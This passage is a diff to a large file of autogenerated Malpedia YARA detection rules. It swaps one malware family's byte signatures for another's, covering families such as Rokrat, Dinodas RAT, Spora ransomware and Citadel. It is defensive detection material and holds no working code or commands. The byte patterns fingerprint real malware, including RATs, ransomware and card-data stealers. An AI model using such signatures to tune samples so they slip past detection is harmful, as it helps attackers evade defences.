-		$sequence_0 = { e8???????? b80a020000 eb02 33c0 }
-		$sequence_1 = { e8???????? 85c0 7408 803b00 7403 48ffc3 }
-		$sequence_2 = { e8???????? 85c0 740f b907b60000 }
-		$sequence_3 = { e8???????? 833d????????00 7411 b906000000 e8???????? 488905???????? c705????????01000000 }
-		$sequence_4 = { e8???????? 85c0 740c b913e40000 }
-		$sequence_5 = { e8???????? 833d????????00 7411 b903000000 e8???????? 488905???????? }
-		$sequence_6 = { e9???????? 488b4c2458 e8???????? 488b4c2450 }
-		$sequence_7 = { e8???????? 85c0 750f b9dc550100 }
-		$sequence_8 = { 25ff9fffff 89442420 8b442420 89442448 }
-		$sequence_9 = { 0f843d010000 488b442440 488b4c2470 488b4920 }
-		$sequence_10 = { 0f84c0000000 48833d????????00 0f84b2000000 41b810000000 488d9424d8000000 }
-		$sequence_11 = { 0f8430010000 488d8c2410030000 e8???????? 4889842460020000 41b07b }
-		$sequence_12 = { 25ff0f0000 89442448 488b0d???????? 48894c2450 }
-		$sequence_13 = { 03442460 488b4c2468 8901 e9???????? 488b542470 488d4c2430 }
-		$sequence_14 = { 253fffffff 89842488000000 eb10 8b442420 }
-		$sequence_15 = { 25c0000000 83f840 750d c78424dc01000001000000 }
+		$sequence_0 = { 8b8d8c040000 898df0000000 488b8d58040000 898df4000000 488b8de8030000 48898df8000000 4889b5c8000000 }
+		$sequence_1 = { e9???????? c6850708000001 c6850608000001 c6850508000001 488d05f0a93100 4889442420 488d0d046e3a00 }
+		$sequence_2 = { eb08 498bc8 e8???????? 0fb64354 2c01 884354 7594 }
+		$sequence_3 = { e9???????? 488b5710 4883c710 4885d2 0f8553ffffff eba4 418b7f10 }
+		$sequence_4 = { e8???????? 410fb68539010000 4c8b4f08 488b9500060000 488b4a60 488b5270 88442470 }
+		$sequence_5 = { 84db 7536 488b05???????? 48c1e001 4885c0 7426 e9???????? }
+		$sequence_6 = { ffcb 4883c720 85db 7fde 498b5740 4885d2 7410 }
+		$sequence_7 = { eb28 48895d50 b908000000 ba10000000 e8???????? eb13 48895d50 }
+		$sequence_8 = { e9???????? 4d89dc 4c89d9 4889fa e8???????? 84c0 0f842f010000 }
+		$sequence_9 = { e9???????? 4983c303 eb3e b80e000000 e9???????? 4983c304 eb2e }
 
 	condition:
-		7 of them and filesize < 6545408
+		7 of them and filesize < 14034944
 }
-rule MALPEDIA_Win_Mailto_Auto : FILE
+rule MALPEDIA_Win_Rokrat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e0688f37-3d60-5119-a0ac-dc5f19aa3f15"
+		id = "a9d530d2-3818-5ce9-961b-9b84701cc153"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mailto"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.mailto_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rokrat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.rokrat_auto.yar#L1-L156"
 		license_url = "N/A"
-		logic_hash = "4dc12b92c2c7f2a09f935b0b6cb8c34c3ae7e4e45623def262729c72d8213e08"
+		logic_hash = "34b666dd9c341c0b6a658755dae5641a6ccdd1f0414b3f92f59cfa0e0e0a459a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -120786,32 +121128,38 @@ rule MALPEDIA_Win_Mailto_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bc8 83c408 85c9 7412 a1???????? }
-		$sequence_1 = { 8d8424d4000000 50 8d442440 50 e8???????? 8d442444 50 }
-		$sequence_2 = { c744246072006900 c744246476006900 c74424686c006500 c744246c67006500 6689442470 6a10 }
-		$sequence_3 = { 8b4c241c 660f1f840000000000 8bc3 81e3ffffff03 c1f81a 0344242c }
-		$sequence_4 = { 83f804 57 0f44d9 e8???????? 83c404 85db 747d }
-		$sequence_5 = { 56 8b742428 56 8b4034 ffd0 83c408 85c0 }
-		$sequence_6 = { 2b442410 83c003 50 e8???????? 83c404 89442410 85c0 }
-		$sequence_7 = { 53 55 56 8b742420 33db 85f6 0f84a0000000 }
-		$sequence_8 = { e8???????? 83c40c c7400c00000000 8d4705 5f }
-		$sequence_9 = { 53 8b2cb0 e8???????? 50 53 ff7504 e8???????? }
+		$sequence_0 = { 50 e8???????? 6a18 33c0 }
+		$sequence_1 = { 50 e8???????? 6a10 33c0 }
+		$sequence_2 = { 50 e8???????? 8d4568 8d4e60 }
+		$sequence_3 = { 6a00 50 8bcb e8???????? 8d4550 }
+		$sequence_4 = { 668945d8 e8???????? c645fc03 8b45bc }
+		$sequence_5 = { 0fb7c1 50 0fb74208 c1e910 51 50 0fb74212 }
+		$sequence_6 = { 56 50 8d45f4 64a300000000 c745fc00000000 33c0 }
+		$sequence_7 = { 50 ff15???????? e8???????? 40 }
+		$sequence_8 = { 50 8bcf e8???????? 8d4538 3bd8 }
+		$sequence_9 = { ff15???????? 50 e8???????? 59 6a64 }
+		$sequence_10 = { 897dfc e8???????? 68???????? 8d4dd8 e8???????? }
+		$sequence_11 = { c1e004 8b44100c 5d 5b }
+		$sequence_12 = { c1e006 03048dc03b5500 eb02 8bc2 }
+		$sequence_13 = { c1e004 8b441008 85c0 7418 }
+		$sequence_14 = { c1e004 8b441004 8d5001 8a08 40 }
+		$sequence_15 = { c1e004 8d0c10 51 e8???????? }
 
 	condition:
-		7 of them and filesize < 180224
+		7 of them and filesize < 2932736
 }
-rule MALPEDIA_Win_3Cx_Backdoor_Auto : FILE
+rule MALPEDIA_Win_Moonwind_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a2feaa4e-af6b-5757-88c5-19fa5e0f7c9e"
+		id = "c3fad56f-d87f-5c82-8de0-ae938da1f3ea"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.3cx_backdoor"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.3cx_backdoor_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.moonwind"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.moonwind_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "92678e8f023e2e18a272c55dabf9fa5b49a39a58d01ec45cd8edb3c746fea107"
+		logic_hash = "e8ac75896a4e3b1235e6b43c3207bc2e4011dd5892e4b54601195386441510bf"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -120825,32 +121173,32 @@ rule MALPEDIA_Win_3Cx_Backdoor_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 49b8ffffffffffffff0f 4c8bf1 493bc0 0f849f010000 488b4910 }
-		$sequence_1 = { 418502 418b01 7409 440fabc0 418901 eba6 }
-		$sequence_2 = { 7575 488b7608 4c8b7608 4c3b7610 7443 33c0 }
-		$sequence_3 = { 488b8dc0010000 488bc1 4881fa00100000 0f82a30d0000 4883c227 488b49f8 }
-		$sequence_4 = { 482bc1 4883c0f8 4883f81f 0f8792090000 e8???????? 4c897580 48c745880f000000 }
-		$sequence_5 = { c60601 498b4660 48894608 0fb655c8 488d4dd0 e8???????? 488bc6 }
-		$sequence_6 = { 4180fa2d 7502 f7db 4584c9 7529 488b07 48ffc8 }
-		$sequence_7 = { 4883fa1f 7305 48ffc2 eb06 33d2 4983c104 }
-		$sequence_8 = { 89442448 ffc8 8bf8 410fb68c80023f0300 410fb6b480033f0300 488d1c8d00000000 8d040e }
-		$sequence_9 = { e8???????? 90 e8???????? 90 488bd3 488d8d80000000 e8???????? }
+		$sequence_0 = { c706???????? 8d4e18 c744241003000000 e8???????? 8d4e14 c644241002 }
+		$sequence_1 = { 83c404 c1e002 03d8 8b1b 895dc4 8b5de0 895dc0 }
+		$sequence_2 = { 8945f0 6802000080 6a00 6800000000 6801030080 6a00 6801000000 }
+		$sequence_3 = { ff75d0 e8???????? 83c408 83f800 0f841d000000 68???????? ff75d0 }
+		$sequence_4 = { 83d8ff 85c0 750b c70201000000 e9???????? be???????? 8bc7 }
+		$sequence_5 = { 6a08 51 8bcd 89542418 8944241c c644242000 e8???????? }
+		$sequence_6 = { 50 6803000000 bb70020000 e8???????? 83c428 a3???????? 6801030080 }
+		$sequence_7 = { ff75f0 e8???????? 83c408 83f800 0f8518000000 c705????????00000000 8d45ec }
+		$sequence_8 = { dc05???????? dd5dd4 dd45d4 e8???????? 8945f0 837df006 0f8469050000 }
+		$sequence_9 = { f3a5 8b45f0 40 c1e002 83c008 50 ff75f4 }
 
 	condition:
-		7 of them and filesize < 585728
+		7 of them and filesize < 1417216
 }
-rule MALPEDIA_Win_Neutrino_Pos_Auto : FILE
+rule MALPEDIA_Win_Dinodas_Rat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "7a087fc7-82b2-5ab1-84ba-f1736b808b97"
+		id = "3767f57e-77fd-50ff-a070-72ae08d30433"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.neutrino_pos"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.neutrino_pos_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dinodas_rat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.dinodas_rat_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "018a5236bd48798fd0b76750c3d5d4efe90b9a49b4a1a51163482fa226bfcefe"
+		logic_hash = "d711c805d5ef765c5b6b2b0b58b4e9853b9a582e9b5d986c36d846c104a514b8"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -120864,32 +121212,32 @@ rule MALPEDIA_Win_Neutrino_Pos_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 5b 6a72 66895d82 5b 6a73 66895d84 8bd8 }
-		$sequence_1 = { 6a69 6689bd74ffffff 5f 6a63 8bdf 66899d76ffffff }
-		$sequence_2 = { ff7508 ffd0 85c0 7523 6840bbd2e3 53 e8???????? }
-		$sequence_3 = { 66898564ffffff 58 6a65 66898566ffffff }
-		$sequence_4 = { 6689855cffffff 6689855effffff 58 6a64 66898560ffffff 58 6a73 }
-		$sequence_5 = { 83f84d 7707 ebe5 83f84d 760b 83f85a 7706 }
-		$sequence_6 = { 8d4df8 51 6a08 56 ffd0 85c0 0f84b7000000 }
-		$sequence_7 = { 56 ffd0 837dfc00 5e 0f95c0 c9 c3 }
-		$sequence_8 = { 6881874190 6a01 e8???????? 59 59 ff7508 ffd0 }
-		$sequence_9 = { 6a72 668945a0 58 6a07 668945a2 58 66894d9a }
+		$sequence_0 = { 8d4598 e9???????? 8d75d4 e9???????? 8d75b8 e9???????? 8b542408 }
+		$sequence_1 = { 83c404 8b8c240c0c0000 5f 5e 5b 33cc 33c0 }
+		$sequence_2 = { 8b5010 8965b0 8965b0 ffd2 837efc00 8d4efc }
+		$sequence_3 = { 33c0 c745e80f000000 8945e4 8845d4 33db 8b5604 8b75cc }
+		$sequence_4 = { 0bca 7d09 8bc7 8bcb e8???????? 8b450c 8b1b }
+		$sequence_5 = { 8dbd9cfdffff e8???????? 8b959cfdffff 8b4af4 8b8590fdffff 83c120 0108 }
+		$sequence_6 = { ff2485769c4200 33c0 838df4fbffffff 898598fbffff 8985b0fbffff 8985d8fbffff 8985dcfbffff }
+		$sequence_7 = { 57 50 8d45f4 64a300000000 8bf1 33ff 8bc6 }
+		$sequence_8 = { e8???????? c645fc01 8b45d4 33db 837de810 895dd0 7303 }
+		$sequence_9 = { 89442428 8d4c2420 51 8d542414 68???????? 52 c644247402 }
 
 	condition:
-		7 of them and filesize < 188416
+		7 of them and filesize < 638976
 }
-rule MALPEDIA_Win_Owlproxy_Auto : FILE
+rule MALPEDIA_Win_Jimmy_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "638fb361-2ad3-53d0-8e4f-9ad0b735dcdb"
+		id = "e00c47ff-70b5-5db3-a3df-5549a310a9aa"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.owlproxy"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.owlproxy_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.jimmy"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.jimmy_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "b8fac1ab1f13b504661c8bdcc9beeb57fc5ec6f3de1faa47de004dfa99391115"
+		logic_hash = "1b3730a9d32503c4a70a6daa21a4c8b83fd1ef93162a202906ad5585e6f013b5"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -120903,34 +121251,34 @@ rule MALPEDIA_Win_Owlproxy_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 4883ec30 48c7442420feffffff 48895c2448 488bfa 488bd9 e8???????? 488d05fe020200 }
-		$sequence_1 = { 48837f1810 7205 488b0f eb03 488bcf ff15???????? eb4f }
-		$sequence_2 = { 488bcf 664489bd88010000 4c897c2420 4489bdb0010000 }
-		$sequence_3 = { 418bfc 6690 bae8030000 488b4dc0 ff15???????? 8bf0 4c89642428 }
-		$sequence_4 = { 48837f1810 7203 488b3f 448bc9 4c8bc7 33d2 }
-		$sequence_5 = { 488b742438 488bc3 488b5c2430 4883c420 5f c3 488d0d7c200200 }
-		$sequence_6 = { e8???????? eb75 4584c0 745b 4883fa08 7355 4c89742440 }
-		$sequence_7 = { b8c0110000 e8???????? 482be0 48c74588feffffff 48899c2418120000 488b05???????? }
-		$sequence_8 = { 4c8bcf 488bd7 488d8d10010000 e8???????? 488b8d90000000 }
-		$sequence_9 = { 480f42d1 488d4c2428 e8???????? 488b4c2430 4c8b4c2428 4a8d040f 4885c9 }
+		$sequence_0 = { 0345e4 8945f0 8b45fc 2b45e4 8945fc 8b451c }
+		$sequence_1 = { 8b45fc 40 8945fc ebe6 8b45fc c9 c3 }
+		$sequence_2 = { 40 898584fbffff 8b8584fbffff 3b8588fbffff 0f83bc000000 6a08 }
+		$sequence_3 = { 6a01 ff7508 e8???????? 59 59 f7d8 }
+		$sequence_4 = { 8365f800 8d45f8 50 6a00 ff7508 a1???????? ffb030010000 }
+		$sequence_5 = { 751a 8b4508 ff7024 e8???????? 59 8b4508 }
+		$sequence_6 = { 8b45f4 0fb700 8b4dfc 0fb709 3bc1 7514 33c0 }
+		$sequence_7 = { 8b45f0 2b45f4 50 ff75f4 ff75fc e8???????? 83c40c }
+		$sequence_8 = { 8945f8 837df800 7449 837d1000 7408 }
+		$sequence_9 = { 7406 837df400 7507 32c0 e9???????? 8b45f0 05f8000000 }
 
 	condition:
-		7 of them and filesize < 475136
+		7 of them and filesize < 188416
 }
-rule MALPEDIA_Win_Virlock_Auto : FILE
+rule MALPEDIA_Win_Vobfus_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9f47c27a-c9f5-5a88-9d0b-7ae966c8318a"
+		id = "0a46ea97-451e-5b39-90ae-66d0e7a88052"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.virlock"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.virlock_auto.yar#L1-L129"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.vobfus"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.vobfus_auto.yar#L1-L223"
 		license_url = "N/A"
-		logic_hash = "57885374cad55b220d8ca1f9432224bf7f5758a9b4619824c3d2cad7d03a8a3d"
+		logic_hash = "cd307f59d811d28b88e7eec0e8a6b94fb0cf2bc6703d3faae8f6ec5a004bc423"
 		score = 75
-		quality = 71
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -120942,34 +121290,48 @@ rule MALPEDIA_Win_Virlock_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 81f234ea98fc ba77fa04fa bb5191b6fe e8???????? 81f2fcfd84fd bb9d77e800 81f32dcee8ff }
-		$sequence_1 = { 41 4a 54 52 4a 4b 55 }
-		$sequence_2 = { 68???????? eb0a 68???????? 68???????? e8???????? 83fa00 751b }
-		$sequence_3 = { 49 52 43 52 58 }
-		$sequence_4 = { 3b12 3646 9a19386f50123e 54 0ae7 0220 6f }
-		$sequence_5 = { d0c3 4a 43 d0a90a2bd0f3 }
-		$sequence_6 = { bb666d87fd 83e904 ba0dd2b2fe eb00 83f905 7d74 bb93ec7eff }
-		$sequence_7 = { 6b484768 e4cc 681cafc880 cf 6a78 d6 49 }
-		$sequence_8 = { 70c1 8a6a8f b3f0 46 fd 098f46182e59 53 }
-		$sequence_9 = { 36a25c6a5eac 42 775c 44 e4f2 2b470c d04ba2 }
+		$sequence_0 = { 8b5508 8b92e8000000 8b8230200000 50 }
+		$sequence_1 = { 8b5508 8b92e8000000 8b82140c0000 50 }
+		$sequence_2 = { 8b5508 8b92e8000000 8b8228070000 50 }
+		$sequence_3 = { 8b5508 8b92e8000000 8b82080f0000 50 }
+		$sequence_4 = { 8bec 8b5508 8b92e8000000 8b82c0170000 50 50 }
+		$sequence_5 = { 55 8bec 8b5508 8b92e8000000 8b82f81b0000 50 }
+		$sequence_6 = { 8b82381e0000 50 50 8b10 ff5204 58 }
+		$sequence_7 = { 8b5508 8b92e8000000 8b825c030000 50 }
+		$sequence_8 = { 00e0 c9 8f00 e3ce 97 00e6 d39500e4d19b }
+		$sequence_9 = { f2ed ec f2ed ec f3ed }
+		$sequence_10 = { c19400d6c49500d7 c59900dac999 00e0 c9 }
+		$sequence_11 = { 801800 0808 0006 3401 }
+		$sequence_12 = { 73f3 aa 5c f6ac4ff8b54ffb }
+		$sequence_13 = { 0006 3401 41 06 1005???????? 0100 }
+		$sequence_14 = { 5c f6ac4ff8b54ffb c058fcca 61 }
+		$sequence_15 = { 1400 48 0008 78ff 0d50004900 3e3cff }
+		$sequence_16 = { a1???????? 00ec dea600e0d4b3 00e0 d4b4 }
+		$sequence_17 = { 41 06 1001 ff06 }
+		$sequence_18 = { f2e8fae6d5f6 d2b5f2bb8ff3 ae 73f3 aa }
+		$sequence_19 = { 7cc8 dc7acd e291 d2e8 }
+		$sequence_20 = { 78ff 0d50004900 3e3cff 46 14ff 0470 fe0a }
+		$sequence_21 = { ff06 0200 0100 8a00 }
+		$sequence_22 = { ec f3ed ebf2 ed ec }
+		$sequence_23 = { 00cf c0b200d1c3b600 e6d3 a1???????? 00ec }
 
 	condition:
-		7 of them and filesize < 4202496
+		7 of them and filesize < 409600
 }
-rule MALPEDIA_Win_Karius_Auto : FILE
+rule MALPEDIA_Win_Petrwrap_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "bdd5efaf-1311-50f9-afba-26e352ee7308"
+		id = "5211c1ab-7958-5b82-8edd-8be8e9b0a5eb"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.karius"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.karius_auto.yar#L1-L247"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.petrwrap"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.petrwrap_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "c2392952453e4a9f29da2ad06ae05ba8bdd1282ea8bcab3057e95c6647f70010"
+		logic_hash = "e84b96f3a3ec1cc8c24cef6cd623aa7e9ff5aec503f26b4080d6b5046ccfe346"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -120981,48 +121343,32 @@ rule MALPEDIA_Win_Karius_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 41b830000000 488bcf ff15???????? 4885c0 }
-		$sequence_1 = { 0f84b3000000 458b9f88000000 4d03de 418b5b18 }
-		$sequence_2 = { 41837b1400 0f8492000000 458b4320 458b5324 33ed 4d03c6 4d03d6 }
-		$sequence_3 = { 488b05???????? 4885c0 7512 ff15???????? 488905???????? 4885c0 }
-		$sequence_4 = { 498bce ffd3 4183bf8c00000000 0f84b3000000 458b9f88000000 }
-		$sequence_5 = { 418b5b18 85db 0f849d000000 41837b1400 }
-		$sequence_6 = { 33ed 4d03c6 4d03d6 448bcd 85db 0f8477000000 8bb424b0000000 }
-		$sequence_7 = { 8bb424b0000000 418b10 8bcd 4903d6 0fb602 0f1f440000 c1c90d }
-		$sequence_8 = { c3 85c0 7505 e8???????? b801000000 }
-		$sequence_9 = { 8b4dfc 83c704 83c104 83c404 894dfc 8bd0 8955f8 }
-		$sequence_10 = { a3???????? 85c0 74e2 ff750c 6a08 50 }
-		$sequence_11 = { 8bc7 ffc8 7416 ffc8 }
-		$sequence_12 = { 0f93c0 eb06 803900 0f94c0 84c0 }
-		$sequence_13 = { 488bc8 ff15???????? 4c8be8 498bce }
-		$sequence_14 = { 8d7b01 448bfb 448be3 4885c9 }
-		$sequence_15 = { c7400c02000000 c7401401000000 8d4104 5d c3 8a01 3c22 }
-		$sequence_16 = { 488d4b10 488d542450 41b804000000 c6430f68 }
-		$sequence_17 = { 7405 f60001 7502 33c0 }
-		$sequence_18 = { 4d8bcf 33d2 41b800001000 488bce ff15???????? }
-		$sequence_19 = { 47 3c2b 7404 3c2d 7501 }
-		$sequence_20 = { 83c40c 85c9 0f8485000000 8a01 }
-		$sequence_21 = { 4d8bcc 4d8bc7 488bd0 488bce ff15???????? 85c0 }
-		$sequence_22 = { 5e 894d0c 5d e9???????? 3c7b 750a 5e }
-		$sequence_23 = { ebc8 8a06 3c41 720c }
-		$sequence_24 = { 6683f809 7505 8d7b02 eb09 }
-		$sequence_25 = { 41b900300000 448bc0 33d2 488bce ff15???????? 4c8bf0 }
+		$sequence_0 = { 83bf9c00000000 7422 e8???????? 89869c000000 85c0 744d ffb79c000000 }
+		$sequence_1 = { 8d4304 55 53 50 e8???????? 50 56 }
+		$sequence_2 = { 894c2444 8b28 8b5804 8bc5 8bcb 0facc813 8bfd }
+		$sequence_3 = { 8b8c2418010000 11460c 8b442428 014610 8b442420 114614 8b442450 }
+		$sequence_4 = { 85c0 0f85ab000000 837dec00 0f84a1000000 8b55f4 8b049580db4600 }
+		$sequence_5 = { 53 55 57 6a0a ffd1 83c410 8bc6 }
+		$sequence_6 = { 8b4d00 89450c 8b03 894c2424 8d04b0 2bf2 c1fe1f }
+		$sequence_7 = { 3b4608 7f04 8bc6 eb12 50 56 e8???????? }
+		$sequence_8 = { 83c410 837df000 741e 90 8d45ec 6a3a 50 }
+		$sequence_9 = { 687f010000 68???????? 8d0480 03c0 6a12 6a09 89442458 }
 
 	condition:
-		7 of them and filesize < 434176
+		7 of them and filesize < 1024000
 }
-rule MALPEDIA_Win_Snojan_Auto : FILE
+rule MALPEDIA_Win_Spora_Ransom_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9f201807-eca2-5671-8fb1-4c54ce96e5b1"
+		id = "5d94c115-8898-5fd2-9400-bd1b65702971"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.snojan"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.snojan_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.spora_ransom"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.spora_ransom_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "1d25311cfd419aa863c883b495c4bbb0986a7541ebe6286749992456a12c9723"
+		logic_hash = "8cb28aa2ca756a794bdd2f8c19a9ebbdf2da0e5ca39f0f44ec247ce30af41008"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -121036,32 +121382,32 @@ rule MALPEDIA_Win_Snojan_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d442bfc c744240804000000 c7442404???????? 890424 }
-		$sequence_1 = { 81c43c900100 31c0 5b 5e 5f }
-		$sequence_2 = { 8b4dc0 6689810000986d 83c30c 81fb???????? 0f8285feffff e9???????? }
-		$sequence_3 = { 83f8ff 0f8452010000 c7442404???????? c70424???????? e8???????? 85c0 89c6 }
-		$sequence_4 = { 31db eb02 89c3 8d4301 8b14859026986d 85d2 }
-		$sequence_5 = { e8???????? 29c4 c744240806000000 c744240401000000 c7042402000000 ff15???????? 83ec0c }
-		$sequence_6 = { 85c9 0f84c3feffff e9???????? 0fb7810000986d 894dc0 89c7 }
-		$sequence_7 = { 56 53 e8???????? 29c4 c744240806000000 c744240401000000 c7042402000000 }
-		$sequence_8 = { 7421 85db 740c ff149d9026986d 83eb01 75f4 }
-		$sequence_9 = { b8???????? e8???????? 85c0 74e9 a1???????? 8b988000986d }
+		$sequence_0 = { ebe9 b005 ebe5 b006 ebe1 }
+		$sequence_1 = { 85c0 7436 03fb 83ff0c 72ec 33ff }
+		$sequence_2 = { f6c301 742c 6a3a 8d4641 668945f0 58 ff7510 }
+		$sequence_3 = { 75b4 8b7df4 57 ff15???????? ff75fc e8???????? }
+		$sequence_4 = { 740e 8b45fc 8b4010 0fb6f0 }
+		$sequence_5 = { 56 6a19 ff75f8 ff15???????? 85c0 7425 837dfc00 }
+		$sequence_6 = { ebf5 b002 ebf1 b003 ebed }
+		$sequence_7 = { 85c0 7466 56 57 bf00020000 }
+		$sequence_8 = { 8d440010 50 6a40 ffd3 8bf8 85ff 7416 }
+		$sequence_9 = { 8bf8 85ff 7416 ff36 }
 
 	condition:
-		7 of them and filesize < 90112
+		7 of them and filesize < 73728
 }
-rule MALPEDIA_Win_Ziyangrat_Auto : FILE
+rule MALPEDIA_Win_Citadel_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "201f34db-38cb-5eda-937b-85ae79e54374"
+		id = "b395dca4-452f-5377-80bb-408553de53db"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ziyangrat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ziyangrat_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.citadel"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.citadel_auto.yar#L1-L161"
 		license_url = "N/A"
-		logic_hash = "f833bf74199bebd7dff936e145830c4820d190515f18da15b78535e3254684ab"
+		logic_hash = "19150147fccb12d09c7c4bd60b0305f74a8937d98e638616a5c6d14e1a34b56b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -121075,73 +121421,79 @@ rule MALPEDIA_Win_Ziyangrat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 2bd3 7506 41 83f912 7ce2 3bcf 7eaf }
-		$sequence_1 = { 3d204e0000 0f8f210b0000 ffd5 2bc6 3df4010000 7e95 ffd5 }
-		$sequence_2 = { 66a5 f7d3 53 a4 e8???????? 8d7c2410 83c9ff }
-		$sequence_3 = { c644240800 f3ab 66ab aa 8bbc2410040000 85ff }
-		$sequence_4 = { ff15???????? 8a0d???????? a1???????? 33d2 891d???????? }
-		$sequence_5 = { 50 6801010000 e8???????? 8bce c1e106 8d540c5c 52 }
-		$sequence_6 = { 49 8bf9 8b4c2464 41 83f91a 894c2464 0f825effffff }
-		$sequence_7 = { 7407 8b4c2424 880429 45 8887244d4100 47 81e7ff0f0000 }
-		$sequence_8 = { c64424534f c644245455 c644245644 c64424572e c64424580d }
-		$sequence_9 = { 85c0 0f84dd000000 8b44241c 3bc3 7634 8d4c241c }
+		$sequence_0 = { eb0e 6800800000 53 57 }
+		$sequence_1 = { 03f7 6a0d 5f e8???????? }
+		$sequence_2 = { 3d00002003 7715 8b4d08 890e 895604 895e0c }
+		$sequence_3 = { ff15???????? 85c0 0f8566010000 57 57 57 57 }
+		$sequence_4 = { 41 66395802 7405 83c002 }
